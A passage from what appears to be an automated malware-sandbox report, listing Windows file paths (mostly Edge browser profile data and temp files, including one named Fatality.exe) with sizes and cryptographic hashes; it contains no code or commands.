ce2f90b81ee3a43f46c29223ad1d981b

SHA1
b82b68c892bd7c8b0bf06a883f1bdcd8ca0121e5

SHA256
7b5c7bc066eb345c6c48189f960ad13fac80add5b5769e2d7a1f59d82a382505

SHA512
85333d169f9815e608eca91d3ba07b18ad6d121806caec0474fd73bcdf22cd0ec032058ae029fd8ac650667df7a382c1fe186ec15f2e13b224a253e7d7c3c674

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

Filesize
19KB

MD5
d37ece4290313a264b5e235c0dadf2fb

SHA1
9ae09bed58122b3d3c4914c45e682dce63993e14

SHA256
e08d9d0fd918211315836b13807379efdf0a22ac163c96f96c5a14d1212781bd

SHA512
28a9ebb27fa73557ed24458864558fca4666cfd53766795b2c6785202fba4ca67a29a25f48d3e11ff9bf462b070349571d67a92b1202ae42ca8583db3a781a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000048

Filesize
50KB

MD5
1271a1c5d6f720a7e67d7baf824f0fff

SHA1
bfae5896c4dbe5dff9b950b4e767293b65101b4f

SHA256
cdb2472eb6fe9d7ccb0f8bea3c2a3d71dda7622574fe24e8b0daf7255d4f2599

SHA512
c88bc90e883ab09008bbbe5dbca421d79d053f68167f7cb5b830a90db4652b4fb277126ca95aa93f9256f630c250de337039c2e6a7d8dc72ab10fb1edc1da46c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
1KB

MD5
b3ea4ff7501f2f271a8a9a4bcdfc5f0f

SHA1
3102a6c608845e758c28a50f6378889c53f2e3fa

SHA256
f28fce89a8667a2971dd62407fe738eef1db105554daa596ebc8dc76f13c4a46

SHA512
b885d3af60c4d8988b07fd2aaba2618156765f0152f43928346bbe188fdcaa868c65e0bb1ae673ac2b85dda61ead888f496bd7377a0d0946934156fefd06206b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
6641451face75305d2f982462cc778e3

SHA1
38a86b159855d25b8d628b66dd219873359b3960

SHA256
b00b3c498b1780ae5362a11e0ac52a006e7bf9efe1d219b60246888531813858

SHA512
326fbc73e099ae9fb69123ff09a8c4b209907f201fe750f8206de3dfb7a0c997c73adf497231a9f6d0c7a3f08c71b70f92ec91e11cb54c99fc36882cc7e78c0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
bb0c5a45f14e899f8bda6971ce6b812a

SHA1
898410b8c7b98a73ca5d6a3d1744db9cf4db6596

SHA256
fb79486c1e100d5ea6b15644b8da40ffcb7af63eba6878f2c7939a5959f06350

SHA512
9af76325c241a5d2966541ffc92c63059a0ea83a476d13ca766356737d1c4c7ca0dd8f27198999086ef3add889830cad4b33b25b0cb2a4e878ab089d08d55bba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
1a503ef80d9e35e35789e758c9bd9e3b

SHA1
935455aefa430ea48bdcc40cc3a63c3e753fff4c

SHA256
39b3a330b2fafc6b132b699c81ac49a060a6cbdedde5e1e280e83a72725c95e3

SHA512
7d36f411d810fd07db483d3b54bbeb9ed2557dcba97ae99ec4d427841a95e9292921813cabac9c3f555c5b02a40d0cf5daac9f35ccc18808d7bdc35c7a704067

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
99d55b1a6c8260964a35c8135891578f

SHA1
4e39070b9b0271853387c1782b9ec6a8aab70428

SHA256
39ee7ee9883da3b0d4ea119849289ef5a7e5b619be3a9a1017ff2583ec9730e8

SHA512
ffacd166942314f8d0adbfb8261232a065df11234497dd328c060e5fddb5ef7c09fda4e232c51fea0f73aca5d2f9b57a90e5660bbc96a6099bae32114eb5bc7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
18aadc3d109d7670d21250471b98bd79

SHA1
5f30868214ddfdb063319c4cac9ad0ce04d3c867

SHA256
e9a3b427b5a158a240598367f4c8c6b422959267bfed66d8224942ac9cc3ef06

SHA512
f84861f8f0d3066f2507913124e2e6ff5bfd49e96bee8148bb7d720fed69f66445302dd306e301879e3926145bd4cc9b4ddb4f6e71aa21f39281f5901ed051bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
aedd27641c633e4d894679762d98e37c

SHA1
d5520caadbe7dd7f039982391bb5392f40f99e89

SHA256
81ceb127225f91918e97fb699868bcd3382e388119b88d04c61b72c9776e92a1

SHA512
5dba0981f751f841af029635e2cff69b7ae7b9490d760c09573e7556424b27de10328793143fed8e422d6ad4b8b1956091e7fbc5d10a619edb6f0e238c59ff93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
de56a23d5539ecf5bb045966784d269f

SHA1
72f34a62148d06fa0b962c329791109da8539782

SHA256
6374702ce48403922b18a95a808422db25ba9c365d2d27200ed73d2c09b84e25

SHA512
2b8d974e910ffb2f75e02b478e54b2715f721be00a2b822cd996ed0b6e710bb664a814c1315dbca9d205651c6ef6d8bb64984ef4133d02968e11d788e3b9a003

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
75bdf83967a8ae7bebbb4f7640707029

SHA1
c414cd54a89d27a762decf53b9193e4c0f929068

SHA256
c833366f1fdb46a172d4717473625b42c1f5763eb2b95fad0fa5b887896fe873

SHA512
6d7081e8184cf3a7729060552c9c7824a565ef555de18d287fd893742fa4945e3e0cc4c61ee1d8e612cee01734c20f6562a92df8e492450e9e6b00f2e3b9d8bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
0a8a9ec46612ca948a0bc7dfe3e5714a

SHA1
f6475b3338e7056089351e7a8df85bce0b81e192

SHA256
e6e2c5e4cade112182d2acb45b887fcbc9783fec0f89e04e4dc94bce54ade07c

SHA512
b5d0b1c5d8b6bee33b33e2ff5ea5a8587a090d246dd579d3ed16ac7257762e9e6fb8997f899cedd5d6fade3daaddeb2990724ba6e84a6ab77fd9a71ecfb83c50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
d94fc0cba211cb38fccd85fe1ebe1d50

SHA1
c9033c2ef5cbf08098c1028436281a97e2c53122

SHA256
ecf9d51d3a6a84477e1fc417970608f7347a3c7951d6c5165375124499746d6a

SHA512
e1975a432213375d3dd50cf0a23761f705bb3739c43cd09568889b2ff9ddc45bdb7f1bff4d3cba15a70d62c99782d492d8dca3c7acbe7ee04982f74b6e57e725

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
97e5ad58761a8405c861888f0ec02382

SHA1
e67cd27c9fc4c8346aa4714454ec3d02c9fd22c4

SHA256
44bbe2c5c20578a17215dfba684ee04301d4783cc0ed769b71ec7c1d4961f057

SHA512
52b7bc2c19f1e29481fabfe5f29f413bb391d7b5e424204c356051fa793ce8ca7beab7982d7744ee6560eef8928d08c803421bfdb52cea581b846cbf2117c57e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
b04d31031839169869824d425e4a0d83

SHA1
873e6447c1f7c2eb23025f4262632a55b161bc94

SHA256
d0acfc942dce3ffc5e6cc4894fd41dbd6ef00bf810a9f3dd99668ef0da962814

SHA512
1127b5564fd04b1fdce860461f6e302cadd3377d3377959270dc9f705180141fb6b22194d5a5851dada2e91ae1004936c7fb6747f8ab8984b3ef74641cc7cd70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
183396fdedf6fa5f1c466a90fbcd73a9

SHA1
37bece6827578a9bebcda19a0b583588885ca23d

SHA256
e6923a8e0e7aeebc9845791e3c96a01935ec836831ed61c88c7610efc80026ed

SHA512
6d7c91c2c5fe55de812b9cdb04c371e7bf66cb06271baf19a31cf14184ff99e668b420d080906d61c1f17a7d7f729c19ca23fab620bb3f82ca609446c56e0fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
381d553ae39ba5102e226581b1838aa5

SHA1
d0f757ff23f6125e47a15aa6f6fdc7ee6a9b7760

SHA256
c4b1bb3fb6ec3d029e4d0412ae5446bc54c0ff51117a6824ac46157550fb8b49

SHA512
84bef06d97e67ce68aae3d8e22f74b29b60eaa2a81a23d602bc283c19c949ca3e40d4db68cf01fbdf6b19a026290d66e57aab5c4a7059f98c47b46637bc7e3c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
e42317b976dab81e962abbbc96a18922

SHA1
988557341e33167d25f9863aa3e28ce91b596ec4

SHA256
19ea503c340d285ba54b79699d7ab29f303d7476768aad17439105095796f560

SHA512
10698209baf5b37eb5cd35fe907bfab8f9b53865ea6cde6424f4b07c93373ae393db70473898c801840be9cd892322adfa1323036e757dd8a8f63bdf6e39eb28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe587c01.TMP

Filesize
48B

MD5
333f7574fc02a3b7256035acdf64cf76

SHA1
0656ad45ef780d74ba8aa5692a0169de17e4652c

SHA256
df0b52bdde6f664a7f756929f636b51fb9d4c954ca5502cf5e2e3e31a43c7bc9

SHA512
2449efc807edbeb024400c14add6bc569a977e380064763ccb90b181ec31470a673fdbb8ffca40f882b450758eea023f4d8e9dd04c1ca25554a1cfd526381d8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ca8213cdcec9650701441803eacdbccd

SHA1
d35b20e78937812da6c1b32d2f2a6b04e1588a8b

SHA256
31106fcd0c659c85fe08c29e3a7ae7fd646e0063dbc15134cc857f2743c82241

SHA512
39ecf81f047301185ec6b603361f86a59656f2390cc94f68563aa895191785d851a4fc13fd7f8a101049c1eb7de5b5a490268f2939e6a034ac36f457887dc38b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
764283badb6c8fb2d266ef6fcffa70d2

SHA1
89341637f2cd7f72f991b6acc0d3456dd0880186

SHA256
bfb2f7c0ad4c55b2823f5aff21dc6902c868ccf844a1a72dcdb0b5e0a0b5741a

SHA512
90d2baf379e510f49eb6829714b3d6f2a70b447d14986c23d23a5bb2b63bd51e77584cb9c4ad9286bfda365038baaf8d197a69842b7cb0f9e499dabd782eba8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5ba609bbbe32c7ca38b6e9c9a559575c

SHA1
bcf228aa968eecfc5ace358d484d76d9b01a16d1

SHA256
eb50cdc84f9a672180fec9daa5693b9d02daf933b97ff30f8afb06de303d5d50

SHA512
d92bf68ebbd1f1016a8d0a86bacacaf4cdeb5fad9ac7734e01751a3d8f636d7fa12b5fb48382140868e83ae3af7993da4da1d0e80c867e44a7f9fca8b4fd03fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
6fa101044fde63328937683df2ff48c1

SHA1
672f51ef7509501d80e45af8199b967cfef60ad5

SHA256
4eab4b9ba50235a1d5ab428dab7b17bb996e640c0b1093912fb700d092de5d4f

SHA512
17c7b865798ccf6b9ab21b54a67d9b6354f17201a5fb99b61e0d7e02900c629b597a3fdc942d3e3a612ac61ed20b021754d58cce550dd136cc92ed1cdcb64b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
893a8cfcd700438b1eb2cbcdebb3eb2b

SHA1
1ba3885791e354d517ff364c4d1a71189642a29d

SHA256
1ae0fc15a2601ce2c63b92e995d6e54ad673c85192b9ab86d549c204ca10647e

SHA512
92880b43f0a0bf008dc652a852abc3e2bacd77c4f874937fb8ef4b63c7792abfc91b5f65ed71f46010712cef1670c7378066092d4ec0ac7ba9dcdd583b1f2737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
1489debb05afb09d8562e4170da0045e

SHA1
2355f3659df7f5fd42b61bc12971b19fe87b9444

SHA256
65c9f0d90a44936fe2c12f441dbc613ccd97314708fe0e320f298d140d258967

SHA512
f44b63db0cbf4864ae6486fe7c5f586becc344f9b1921c2bb5d37948113d31b23e9593f96e8560ee894f1bc131488ed7b0c144b7b4b5da6e681710e7db94f12c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e0a598c76b0bca78f02c7f9ed631e498

SHA1
4e9b68c795768c00034ded36c4ddd27d620fdb98

SHA256
d770a4c8abf854ccf25faa99ecfeabd7a80ddf81aee67b213590a3faaf4bb93d

SHA512
f567ec079f33c6431030a871e4dd0ff99c9c2d242afcd38cd7100b64d0271ce65d3485115e87b71d9dcbb213ba6a0bc2870f3a01809c1a258a23ec3b0f5afab7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e77284a88e3e91d92c5ebd5344209d3e

SHA1
b3b3d008b0d3eb3e4b17e4cdef570097bf086f21

SHA256
d7479aeeda18d2b011396823875fb1a89cd195ff08ac5be5873344c69ae4620d

SHA512
1fa73631a7f8bca7ed8c8027b38ffaf05acd1f0a589b792287d462ff23935c73408e61eed377c725f7d40a78934d5add1e011b066a1f3581c6f840d372035902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
15153388a4295b8dbbbfa34bbd611d91

SHA1
e56562beb67ca8caccd453aff7add07c9aec017c

SHA256
a475e6398e97d42fd744985756a898bf68895ee0778c54d75a9664485196d5c9

SHA512
801cd2ae6a7a46c55fd02e665f63c086edb4e6d578249fae89f4070a7553d83755cc9d20fb9c880d3add51c11ce81a3c4ecbc8dcfcd1f03739ba0a6e50acf460

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
ddc13d96446e6375f6bf9fa4ad7ffc9f

SHA1
1c6b64815280ce52138c105e53e52e5de14be19a

SHA256
48ac500eaf8604fd7558475a2d4712a0c1f27b8beadb0844b14e97ba860ccddc

SHA512
54aeffd9a7487236940d3ac848e6215f3a7247145351347ae0d84bf6144614bb24605a37737db04acde00755aa52edf9078ce0bf2ec696e20e1411ed971e07d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
1283ba0a69bbeb29f185d12857357c53

SHA1
06eaa960c8cf9a91e4c398b9c914a9c5faf9c5b2

SHA256
b983002061e901b9cd024b4da1f54e0597b2715381336f66ccc5187db2e347f6

SHA512
107aed6a9228d007efe788c6b52aacebe042a49ac26fc194f494b39d7cfd3032535090ab99707d392cb5a0a4f5ffd1c8ee8d5b6ff52dbc3e4e41b6d5ab8641b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
815ed2e801bd30e6316a01e00f9a39b1

SHA1
9a5379aca95fbba65937e4902b9ecbccef0c0f65

SHA256
aa2a83d89db1ca0c925d98e4e831f04fc0f1d959351003d7d031f093f4e88da0

SHA512
34c1c992b54aed6e4891a107b50e770260876ccc13a1d08761c50849666a7e2b3aa026bc80daec8a49100f0538400b17e02dcfd65ae3b26465c8dd475a80b798

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
b486ec59b1b1c368b129c771f121f9f1

SHA1
2438a298a250537fae903d646a9ea018a753a653

SHA256
9975401704723ecb8f72276a1a9ecfa141365f2786dd7b66e7700a59db02a9f1

SHA512
82dd07246881df8cf8d740e8aee2b8c7678665845f9cf97e0cc81955c8194ee1c7ad317fb5e4bd3b239a079ab691e6fa7d16dad216b3795028a5ecd85ed71681

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
ce17176c91523ec007843b2aa759c2e3

SHA1
5ac0ae559d8f6741da7d3617aaf99eca70ecf10c

SHA256
c81df15425c5f01187198e7a86a34c723904fe37f8b25e51389cbf8aad7c6122

SHA512
af0abce248b4d1eae7d7509aea8602be79b42ab4a7f1dfba1a423df3e8d41e50bd3f1ec03f053ac038c69f67399be748ab7d3b3395272e152cb1f0dc99a8da01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
d8fa5f833842581832fc8b644f00693c

SHA1
7ad925355d97f505f7844f1b6a91c20ddb73d77f

SHA256
7e79a61fa129f2d269cfad85ecc754cfe4d5b2a720ddb04f221d4fcc48b41fe2

SHA512
1301223416b00cd720d247d70501f0c163dbfaba3fea9789b8580a935e609ab6ac8b22f0059d261bb5770a506d51bdbbef901782c073e7386409652045966bfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e6807c6147960eeaf7959a490af2af56

SHA1
f4832d8f1f2a2e62e7bb27f34cf6035179209a24

SHA256
49169294abf1a2d44b42e49334e0ab13635de2021ff020843f9b4e87f948199d

SHA512
111ec696e9199ced8e7136f906009c0fdd144939e7735d19a0fe9c9d00874581345e0b8f359109a94fc5e449c88df738bf1a7a8dba9a0cce9a56f1845d774697

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
9384953530c58eba910629ae3c2a34ed

SHA1
0687f6cdb66c5237f570817e3459f6bc937bb855

SHA256
a4965750fee76b15bbf490f1ddd7bdf0f0939d4fe744e3296b15bb691fc77dc5

SHA512
ba1b6e748af7d07bc92328a997cfe9d444f74d1aebd1c739f22c70099305874c41e1a51dd861d826fb0598ae1d3046375ea41e03c1425b18293582808b515f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
a3006d49c7e8d6178ab4e84a1ef67da8

SHA1
af567ead66aa4f3b11463b91c3dcb47d867038cf

SHA256
df2d28e1672afc8874f2c0cef0841b73cc47434c280f14668be566910e2413c9

SHA512
6c72372179ffdc37b1526ed4e15eb84117e01144598cf502387207d5ac3ffca445d1822c44ca9ac4754c5b858e40c6efbccd058266efd07cc1fcc63cf00a3684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e6b97ba0ecd43d0a6e462d1a70cb29d0

SHA1
c49701cad84425ab005a9caecda0fbc5bdbf79d2

SHA256
39ccc375cb80ed0f1a820f346fab6237689db0f0bd1b33c67f0b57dc8bdbff47

SHA512
19df133f5a1ef0d95b46d330615576eaa0ab9ac891a262fa81d09c120b96fe22e78c87c81a2eefb6228b6bc72eb68e158280c71011cdc34b67bca62f956b2dae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
8e9ba62071005042c010cd124aceac37

SHA1
92114f291079b33a104f13aa8b7829c6962f2dc7

SHA256
ab13dff24258364e2afab9004fe872730ac2f5ae7ce2f2ef5293d80fada90cb4

SHA512
4be014c6741aed5fbe9f0f969c98806e024304d08e92d3e08e05a078472a52849a6af1de1145c4b1f97e60ad0422d21fa0a7b9af2d80c3ba432310ce8215edd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
16ec1f5338d0f5388ec242d962c387a2

SHA1
d62edc5bf40a4362ba07e6559f440de04547ce36

SHA256
5a48086b6cc1a5b135f8ae3adbd3511f56f74df11fa740fba1635c05cb49c573

SHA512
87230c2511bdcd2d2b6b517a2a3cd2fefacb5112b45eab64fd4e2ce854190c8685f08ffcb81bed47b6d668e32f0889734143eddf7fced13fd456576f074e5336

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
28cb58ff213ded74f671264f87e66894

SHA1
c65d726576787dc21628b70c92eb850556e4ec3f

SHA256
a92bf4386d87a2fc04f80afb12dc6f1931f6995888b536610b4b823a63351fb9

SHA512
5638c9c87d5e20c6b59ae4fee23e21ce9e016fe99453cbf536e987382cc935783eceb51211db35a908ae9ac5c93e6a7d27a6b0d5da9dd3b37588e0e6111406af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
0ace76591ec1a06c1b01c910d31f33a6

SHA1
c5e23d07a8be4f4275691c5d15eec6c6411141d3

SHA256
22c38653978ff3833acff0e885d0a836c0e5075ed94417df9b26b421e6213c3c

SHA512
dbe24518d3eb311e7545a4ae882fd51c4eecfee2aafd9f924464d892f43a680150f71d067d587e6c05aa5a2ef646367aee237a19c9ee710afaa6e77f904b4402

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
ade2b42c931eb6f67aaadc5bc798a53b

SHA1
4136256b8cfbb1606a7d9e9fa99589f50e3e92ef

SHA256
cfd3ca6db6d6893c21aa08dabaa214997187663c983cda603d342d463419a162

SHA512
085916bf52381e9fc3cb4fdd61dca83db6be5eeef4a2f3c0fa3595ff91874f7fbfbc871a6b30029b4ece8660e8ad9539706022e78d3eb7ac31e65fd3a7c85e31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580b17.TMP

Filesize
2KB

MD5
a7ea8941c32596c0e480ca0279f134b7

SHA1
5c071536296674ba424495702ff32e0d5555bdf9

SHA256
0550e5e2f9f5afc023fa2382c15ec0ee4e318c65bf3d09c481e3a3b28c3395a8

SHA512
84d95e1786931254f9a4b87269fe7cff8d5433f84fc8643fab19b41af6b57a679dca714bd62b50ef79bdab2c6203cd65884d112a0b3718c5d495e4550b8887f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2ee3a0a8fbf5ac65b9b50b7230d1a86d

SHA1
656d2fe5c81fa9f7fa37b8540eaffca1f35eb2e2

SHA256
08ad29b7e36e7fb35f45b6600eadbb494b1f8360315e6b87e8efc460e21744ad

SHA512
72e2c91e49e486c373e6465e76a79c1bc302a377ede729b5e8b2aeaa31a7fcec179bd41b02ca78fd79d2e4fa977f4b59b1d97ddfcca5b31623a7fa2bf6910bc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
678339bd5d8d15ab71750f688bf414f4

SHA1
79ab9ca5a530aaab5a3cc1764ed1dd4aeba3b146

SHA256
d943927ed2449c2d29d8508af16185c78c8b1823e2630ff2d018226da3a19ddb

SHA512
0015cf7c737e9d57168472cf4b5ccd98db951cf1330e0595118e786fa3c25a1eb340c0d7532f8a9f7a34b63b192e2e791a7838401758ccc40015a58595471e86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1d7858e8d5c1c4e4b46341924f265f67

SHA1
c16907c1bad85e79dc243be2eb40829fe500732c

SHA256
8296578b1fba77da1a7ff9283b3bcdaa256b6c25bbd043276832c2e7a36d4793

SHA512
051417b6fd6385cbe4e5675a59d878dcf94ddb56a32385e57b1e6a67e50aadd178b3b3e276eb4398a2f67302c0a17e75c64775e1323169e66ba26a7fd633cf41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
862e9f16a7a17ba1da9a8bc38a35504e

SHA1
c94346b7c045c54b73e34218b632dd4950fbec33

SHA256
cf525324774340a704d4429aaa32d5e7983a9be18a424ba43798929995285893

SHA512
952b59322198c6dec637f857b80de197f13119b50d5734c8394e147490d925971a310611ad162f866d19e5572005d1a4c22a52e07d4fd83a2d624f1fdaaad828

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
37a97049f8dd31b43134b86f2214ae28

SHA1
27bc95a3c0c2f32a31b7214e702124aed1aa6724

SHA256
28998513b2ab2e0fe806b88c5a78d73689f0548c25229a383cd6d4b2d5824209

SHA512
963ccf7d0e4a39cf0ec19b9540a2ff1f92d40e5c099be69c93ec4e9cc3756b70cb0d6ef6c28fc3294741f5333c4f7e93fb5d8fa741c90bb1edb1356205eb15b2

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
a73ea6e1db27acedbe4055c448f82ef7

SHA1
01769a266d26c4b4b374099606e86b8874ddd55f

SHA256
c3059c62596021e555ec7901361fcde75078ad931bcac6027539930bef8b77d9

SHA512
f9cfe99077e40ac3ff11ab39020d6e159ec06cf50f9b1d156858198d48851d29de8882a18609a17dd30ddea421c6c415683b8d7b14fa30a51ddd1cd76032deb4

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
c08cda8b30daf0f971ed3fca378d480d

SHA1
8c0a3593ff62ec10f1c6e88d448eb8e23aaf7662

SHA256
1af0cf8b1e5f3299794832e511471afa6fcd4a10987464a7c043285cd49f0c58

SHA512
3cae2439b79bc45a0e233e9178224eba4164e535f7b94dbc02d703db37513c73c4ea6cb94cd2f37b2c5e3c37f807555c51bb7902679db2538c3f16a9db1114a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe:Zone.Identifier

Filesize
60B

MD5
98bfc821dd17ceab99bf109837d5e5de

SHA1
e7984a5394d76911040439bcb69ec90edbe90f27

SHA256
94db7eb75ccb8e8c70986849ab0cbb8396d5109a11b829823bcbbe6b7cf347e4

SHA512
975d030330acc53ab2d4222b9a3a06bf29e3b9259353755eab3bb4a6957f3b70c6f8b3e08cdaed3e1327aee42e0972b02a5ef74eff7908541e439a06aaf956d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CisUtMonitor.sys

Filesize
56KB

MD5
1b16fa25136adb7b3c41a3f1d474c901

SHA1
d6d0fc8367c3939fedc45474c37ed16b83b53f15

SHA256
917572f2a45f7b8312ed09d783418534e95888c10f3e0b6cf40c5df58a7c390d

SHA512
e67e214b87b7b5ff9a678d4ccf4c65f8f828e46969498e8163b565658baccb3d72c60c43e8b5a459ec0215e079949182c92c750484f1b3dfd0e5af21634cf236

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hk4wd0ZBhT9hLJa

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efu15lug.a0r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\v3sWP1P9iZMCLzO

